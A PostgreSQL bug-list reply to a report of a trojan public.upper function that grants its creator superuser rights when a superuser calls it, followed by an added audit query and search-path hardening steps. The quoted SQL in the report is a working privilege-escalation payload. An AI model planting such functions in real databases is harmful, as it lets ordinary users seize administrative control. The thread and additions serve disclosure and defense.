Re: BUG #16448: Remote code execution vulnerability

From: Heikki Linnakangas <hlinnaka(at)iki(dot)fi>
To: abcxiaod(at)126(dot)com, pgsql-bugs(at)lists(dot)postgresql(dot)org, PG Bug reporting form <noreply(at)postgresql(dot)org>
Subject: Re: BUG #16448: Remote code execution vulnerability
Date: 2020-05-18 09:49:51
Message-ID: 8adfb8f8-91f0-1dd5-15c0-12cdba61b191@iki.fi
Lists: pgsql-bugs

On 18/05/2020 12:14, PG Bug reporting form wrote:
> The following bug has been logged on the website:
>
> Bug reference: 16448
> Logged by: yi Ding
> Email address: abcxiaod(at)126(dot)com
> PostgreSQL version: 10.12
> Operating system: linux
> Description:
>
> A common user created a function in the public space and added some
> malicious code in the function, when other users with superuser rights call
> this function, the malicious code will be executed, so as to achieve the
> purpose of remote malicious code execution.
>
> First, Non-superuser lh defines a function named upper, which contains
> the statement to modify user permissions.
> SQL:
> CREATE TABLE public.testlh AS SELECT 'lh'::varchar AS contents;
> CREATE FUNCTION public.upper(varchar) RETURNS TEXT AS $$
> ALTER ROLE lh SUPERUSER;
> SELECT pg_catalog.upper($1);
> $$ LANGUAGE SQL VOLATILE;
>
> Second, Superuser pg01 will execute the above statement after calling the
> upper function, which will change user lh to a super user.

See
https://wiki.postgresql.org/wiki/A_Guide_to_CVE-2018-1058%3A_Protect_Your_Search_Path

- Heikki
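
An added example, not part of the original message or of the linked guide's text: an audit query a DBA could run to find functions outside the system schemas that reuse the name of a pg_catalog function (the pattern the report describes with public.upper), followed by search-path hardening statements. The role name pg01 is taken from the report; everything else is illustrative.

```sql
-- Added example. Run as a superuser in each database to be checked.
-- Pin the session's own lookup first so the audit itself cannot be
-- redirected by objects in other schemas.
SET search_path = pg_catalog, pg_temp;

-- 1. Audit: functions in non-system schemas whose name collides with a
--    function in pg_catalog. An unqualified call can resolve to one of
--    these when its argument types match better than the built-in's
--    (upper(varchar) in public versus upper(text) in pg_catalog).
SELECT n.nspname                                            AS schema_name,
       p.proname                                            AS function_name,
       pg_catalog.pg_get_function_identity_arguments(p.oid) AS arguments,
       pg_catalog.pg_get_userbyid(p.proowner)               AS owner,
       r.rolsuper                                           AS owner_is_superuser
FROM pg_catalog.pg_proc p
JOIN pg_catalog.pg_namespace n ON n.oid = p.pronamespace
JOIN pg_catalog.pg_roles r     ON r.oid = p.proowner
WHERE n.nspname NOT IN ('pg_catalog', 'information_schema')
  AND n.nspname NOT LIKE 'pg\_%'
  AND EXISTS (
        SELECT 1
        FROM pg_catalog.pg_proc c
        JOIN pg_catalog.pg_namespace cn ON cn.oid = c.pronamespace
        WHERE cn.nspname = 'pg_catalog'
          AND c.proname = p.proname)
ORDER BY owner_is_superuser, schema_name, function_name;
-- Rows with owner_is_superuser = false deserve review first: they were
-- created by an ordinary role in a schema other roles may search.

-- 2. Hardening: stop ordinary roles from creating objects in public.
REVOKE CREATE ON SCHEMA public FROM PUBLIC;

-- 3. Hardening: keep public out of the privileged role's default
--    search path (pg01 is the superuser named in the report).
ALTER ROLE pg01 SET search_path = "$user";

-- 4. Verify the per-role setting that new sessions will pick up.
SELECT rolname, rolconfig
FROM pg_catalog.pg_roles
WHERE rolname = 'pg01';
```

The ALTER ROLE setting applies to new sessions only, and a database-level or session-level search_path can still differ, so the audit query should be rerun after the change.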
